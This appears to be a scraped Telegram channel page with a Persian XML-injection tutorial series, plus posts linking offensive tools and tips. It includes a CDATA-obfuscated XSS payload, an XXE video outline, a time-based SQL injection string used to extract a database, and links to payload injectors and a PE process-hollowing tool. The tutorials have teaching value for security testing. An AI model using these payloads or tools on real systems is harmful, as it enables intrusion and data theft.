🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_1
➖➖➖➖➖➖➖➖
اموزش باگ XML .
قسمت : اول
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
اموزش باگ XML .
قسمت : اول
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
0Day.Today | Learn Exploit | Zero World | Dark web |
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_1 ➖➖➖➖➖➖➖➖ اموزش باگ XML . قسمت : اول ➖➖➖➖➖➖➖➖ @LearnExploit 🌀 IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_1
➖➖➖➖➖➖➖➖
🔰 در خدمت شما هستیم با اموزش XML-Injection :
✳️ 1 - تعریف ساده از XML :
XML (Extensible Markup Language)
که یک زبان نشانه گذاری ساده میباشد که برای سازماندهی کردن، ذخیره کردن و فرستادن اطلاعات به کار میرود.
مهمترین نکته در مورد XML :
تگ های XML از قبل تعریف شده نیستند، شما خودتان باید آنها را تعریف کنید.
ایکس ام ال (XML) از یک (Document Type Definition) DTD برای شرح اطلاعات استفاده میکند.
➖➖➖➖➖
✳️ 2 - نحوه ی کشف اسیب پذیری :
❇️ 2_1 - نحوه ی کارکردن برنامه :
فرض کنید که یک برنامه تحت وب از رابط سبک XML برای ثبت نام کاربران استفده میکند و این کارو با ایجاد گروه جدیدی به نام <user> و در فایلی به نام XML_db.xml ذخیره میکند.
💤 محتویات فایل XML_db.cml :
به مثال زیر دقت کنید :
❇️ 2_2 - نحوه ی تست برنامه :
برای تست اسیب پذیری برنامه از metacharacters های XML استفاده میکنید.
مهمترین و ساده ترین کاراکتر های موجود در XML :
• Single quote: ( ' ) :::
مقدار زیر رو در نظر بگیرید دوستان :
inputValue = amir'
باشه
در نتیجه نحوه ی قرار گیری در داخل فایل XML_db.xml به صورت زیر خواهد بود :
<node attrib='amir''/>
پس در نتیجه فایل XML_db.xml به خوبی شکل نمیگیره.
➖➖
• Double quote: ( " ) :::
مورد دیگر دابل کوتیشن میباشد که همانند تک کتیشن کار میکند. (نیاز به توضیح اضافه ندارد.)
➖➖
• Angular parentheses: ( > و < )
مورد سوم استفاده از پرانتز ها میباشد که اگر ورودی ما به صورت زیر :
Username = amir<
باشد ،نحوه ی قرار گیری در فایل به صورت زیر خواهد بود :
➖➖
• Comment tag: ( <!--/--> )
حالت چهارم یعنی کامنت نیز همانند پرانتز ها عمل میکنه...
➖➖➖➖➖➖➖➖
⚠️ دوستان به پایان بخش اول از اموزش XML- Injection رسیدیم ،امیدوارم که از این اموزش هم نهایت استفاده رو کرده باشید.
⚠️ نوشته شده در گروه اموزشی LearnExploit .
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
🔰 در خدمت شما هستیم با اموزش XML-Injection :
✳️ 1 - تعریف ساده از XML :
XML (Extensible Markup Language)
که یک زبان نشانه گذاری ساده میباشد که برای سازماندهی کردن، ذخیره کردن و فرستادن اطلاعات به کار میرود.
مهمترین نکته در مورد XML :
تگ های XML از قبل تعریف شده نیستند، شما خودتان باید آنها را تعریف کنید.
ایکس ام ال (XML) از یک (Document Type Definition) DTD برای شرح اطلاعات استفاده میکند.
➖➖➖➖➖
✳️ 2 - نحوه ی کشف اسیب پذیری :
❇️ 2_1 - نحوه ی کارکردن برنامه :
فرض کنید که یک برنامه تحت وب از رابط سبک XML برای ثبت نام کاربران استفده میکند و این کارو با ایجاد گروه جدیدی به نام <user> و در فایلی به نام XML_db.xml ذخیره میکند.
💤 محتویات فایل XML_db.cml :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>X0P4SH4</username>
<password>!3C</password>
<userid>0</userid>
<mail>LearnExploit@gmail.com</mail>
</user>
<user>
<username>Evil_Boy</username>
<password>13c</password>
<userid>500</userid>
<mail>LearnExploit_2@gmail.com</mail>
</user>
</users>
هنگامی که یک کاربر با پر کردن یک فرم HTML خود را ثبت می کند، برنامه داده های کاربر را در یک درخواست استاندارد دریافت می کند، که به خاطر ساده بودن قرار است به عنوان یک درخواست GET ارسال شود.به مثال زیر دقت کنید :
Username: Mobin
Password: Un!e
E-mail: LearnExploit_3@Gmail.com
اطلاعاتی که توسط متد GET فرستاده میشن :http://www.LearnExploit.com/addUser.php?username=Mobin&password=Un!e&email=LearnExploit_3@Gmail.com
بعد فرمی شبیه فرم زیر در فایل XML_db.xml ساخته میشود :<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>X0P4SH4</username>
<password>!3C</password>
<userid>0</userid>
<mail>LearnExploit@gmail.com</mail>
</user>
<user>
<username>Evil_Boy</username>
<password>13c</password>
<userid>500</userid>
<mail>LearnExploit_2@gmail.com</mail>
</user>
<user>
<username>Mobin</username>
<password>Un!e</password>
<userid>500</userid>
<mail>LearnExploit_3@gmail.com</mail>
</user>
</users>
ساخته میشود.❇️ 2_2 - نحوه ی تست برنامه :
برای تست اسیب پذیری برنامه از metacharacters های XML استفاده میکنید.
مهمترین و ساده ترین کاراکتر های موجود در XML :
• Single quote: ( ' ) :::
مقدار زیر رو در نظر بگیرید دوستان :
<node attrib='$inputValue'/>
پس اگه ورودی ما به صورت :inputValue = amir'
باشه
در نتیجه نحوه ی قرار گیری در داخل فایل XML_db.xml به صورت زیر خواهد بود :
<node attrib='amir''/>
پس در نتیجه فایل XML_db.xml به خوبی شکل نمیگیره.
➖➖
• Double quote: ( " ) :::
مورد دیگر دابل کوتیشن میباشد که همانند تک کتیشن کار میکند. (نیاز به توضیح اضافه ندارد.)
➖➖
• Angular parentheses: ( > و < )
مورد سوم استفاده از پرانتز ها میباشد که اگر ورودی ما به صورت زیر :
Username = amir<
باشد ،نحوه ی قرار گیری در فایل به صورت زیر خواهد بود :
<user>
<username>amir<</username>
<password>4kb!e</password>
<userid>500</userid>
<mail>LearnExploit_4@gmail.com</mail>
</user>
و باعث ایجاد اررور میشه.➖➖
• Comment tag: ( <!--/--> )
حالت چهارم یعنی کامنت نیز همانند پرانتز ها عمل میکنه...
➖➖➖➖➖➖➖➖
⚠️ دوستان به پایان بخش اول از اموزش XML- Injection رسیدیم ،امیدوارم که از این اموزش هم نهایت استفاده رو کرده باشید.
⚠️ نوشته شده در گروه اموزشی LearnExploit .
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_2
➖➖➖➖➖➖➖➖
اموزش باگ XML .
قسمت : دوم
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
اموزش باگ XML .
قسمت : دوم
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
0Day.Today | Learn Exploit | Zero World | Dark web |
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_2 ➖➖➖➖➖➖➖➖ اموزش باگ XML . قسمت : دوم ➖➖➖➖➖➖➖➖ @LearnExploit 🌀 IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_2
➖➖➖➖➖➖➖➖
🔰 در خدمت شما هستیم با اموزش XML-Injection بخش دوم :
✅ مورد پنجم و ششم برای کشف اسیب پذیری در xml :
• Ampersand: ( & ) ::::
⚜️ امپرسند یا (&) در XML برای نشان دادن موجودیت ها استفاده میشود.
منظور از موجودیت ها (برای مشاهده موجودیت ها بر روی pic بزنید)
Pic
مثال زیر رو در نظر بگیرید :
< = <
مباشدو از قبل برای XML تعریف شده و XML با گذاشتن ( ; ) میتونه اونو تفسیر کنه...
اما حالا مثال زیر رو در نظر بگیرید :
Username = &AMIR
نحوه ی قرار گیری در فایل :
در این کد مفسر با قرار دادن ( ; ) در اخر
&AMIR;
اونو شناسایی نمیکنه و
&AMIR;
ورودی هست که مفسر اونو نمیشناسه و مشکل ایجاد میشه...
➖➖➖➖➖
مورد دیگر
⚜️ اختیارات بخش CDATA یا
CDATA section delimiters
میباشد.
که به صورت زیر میباشد :
• CDATA section delimiters: ( <![CDATA[ / ]]> )
در این حالت کاراکتر هایی که داخل CDATA قرار دارن توسط مفسر XML تفسیر نمیشن :
به مثال زیر دقیت کنید :
فرم کلی یک فایل HTML :
الان در $HTMLCODE کد های زیر رو وارد میکنیم :
نحوه ی قرار گیری در فرم :
وقتی مفسر اونارو تفسیر میکنه نتیجه کد زیر میشه :
که حاکی از وجود باگ XSS میباشد.
➖➖➖➖➖
🆘 به پایان بخش دوم از اموزش Xml-Injection رسیدیم.
♨️ امید بران است که نهایت استفاده از این اموزش کرده باشین دوستان.
⚠️ اختصاصی از گروه اموزشی LearnExploit .
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
🔰 در خدمت شما هستیم با اموزش XML-Injection بخش دوم :
✅ مورد پنجم و ششم برای کشف اسیب پذیری در xml :
• Ampersand: ( & ) ::::
⚜️ امپرسند یا (&) در XML برای نشان دادن موجودیت ها استفاده میشود.
منظور از موجودیت ها (برای مشاهده موجودیت ها بر روی pic بزنید)
Pic
مثال زیر رو در نظر بگیرید :
<tagnode><</tagnode>
< = <
مباشدو از قبل برای XML تعریف شده و XML با گذاشتن ( ; ) میتونه اونو تفسیر کنه...
اما حالا مثال زیر رو در نظر بگیرید :
Username = &AMIR
نحوه ی قرار گیری در فایل :
<user>
<username>&AMIR</username>
<password>root</password>
<userid>0</userid>
<mail>LearnExploit@gmail.com</mail>
</user>
در این کد مفسر با قرار دادن ( ; ) در اخر
&AMIR;
اونو شناسایی نمیکنه و
&AMIR;
ورودی هست که مفسر اونو نمیشناسه و مشکل ایجاد میشه...
➖➖➖➖➖
مورد دیگر
⚜️ اختیارات بخش CDATA یا
CDATA section delimiters
میباشد.
که به صورت زیر میباشد :
• CDATA section delimiters: ( <![CDATA[ / ]]> )
در این حالت کاراکتر هایی که داخل CDATA قرار دارن توسط مفسر XML تفسیر نمیشن :
به مثال زیر دقیت کنید :
فرم کلی یک فایل HTML :
<html>
$HTMLCode
</html>
الان در $HTMLCODE کد های زیر رو وارد میکنیم :
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
نحوه ی قرار گیری در فرم :
<html>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>
وقتی مفسر اونارو تفسیر میکنه نتیجه کد زیر میشه :
<script>alert('XSS')</script>
که حاکی از وجود باگ XSS میباشد.
➖➖➖➖➖
🆘 به پایان بخش دوم از اموزش Xml-Injection رسیدیم.
♨️ امید بران است که نهایت استفاده از این اموزش کرده باشین دوستان.
⚠️ اختصاصی از گروه اموزشی LearnExploit .
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
Telegram
AttachLearnExploit
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3
➖➖➖➖➖➖➖➖
اموزش باگ XML .
قسمت : سوم
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
اموزش باگ XML .
قسمت : سوم
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3 #XXE
➖➖➖➖➖➖➖➖
✅اموزش باگ XML .
〽️قسمت : سوم
🔆در این ویدیو که برای شما اماده شده یاد میگیرید که :
⭕️1 - ایکس ایکس ای (XXE) چیست ؟
⭕️2 - اموزش و نحوه ی خواندن اکسپلویت های XXE
⭕️3 - تست اسیب پذیری XXE
⭕️4 - استفاده از سه نوع اکسپلویت (Remote file - XSS - CDATA XSS)
➖➖➖➖➖
🚸به پایان بخش سوم از اموزش Xml-Injection رسیدیم.
♨️امید بران است که نهایت استفاده رو از این اموزش کرده باشین .
⚠️اختصاصی از گروه اموزشی LearnExploit .
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
✅اموزش باگ XML .
〽️قسمت : سوم
🔆در این ویدیو که برای شما اماده شده یاد میگیرید که :
⭕️1 - ایکس ایکس ای (XXE) چیست ؟
⭕️2 - اموزش و نحوه ی خواندن اکسپلویت های XXE
⭕️3 - تست اسیب پذیری XXE
⭕️4 - استفاده از سه نوع اکسپلویت (Remote file - XSS - CDATA XSS)
➖➖➖➖➖
🚸به پایان بخش سوم از اموزش Xml-Injection رسیدیم.
♨️امید بران است که نهایت استفاده رو از این اموزش کرده باشین .
⚠️اختصاصی از گروه اموزشی LearnExploit .
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
Telegram
AttachLearnExploit
File.xml
1.5 KB
🔰 #XML #Injection (XMLi) #Tutorial #Vuln #Part_3 #XXE #File
➖➖➖➖➖➖➖➖
فایل استفاده شده در اموزش
(از قلم افتاده 😁)
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
➖➖➖➖➖➖➖➖
فایل استفاده شده در اموزش
(از قلم افتاده 😁)
➖➖➖➖➖➖➖➖
@LearnExploit 🌀
IR0Day.Today BOY'S
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/Tech_Army
#Injection #Hacking_Tool #BugBounty
BugCod3
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
SQL Injection
After this, I used ghauri to extract the database It was successful
#SQL #Injection #ghauri #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
After this, I used ghauri to extract the database It was successful
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
#SQL #Injection #ghauri #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
Ghostly Hollowing Via Tampered Syscalls
Implementing the ghostly hollowing PE injection technique using tampered syscalls.
😸 Github
⬇️ Download
🔒
#syscall #Injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Implementing the ghostly hollowing PE injection technique using tampered syscalls.
LearnExploit
#syscall #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM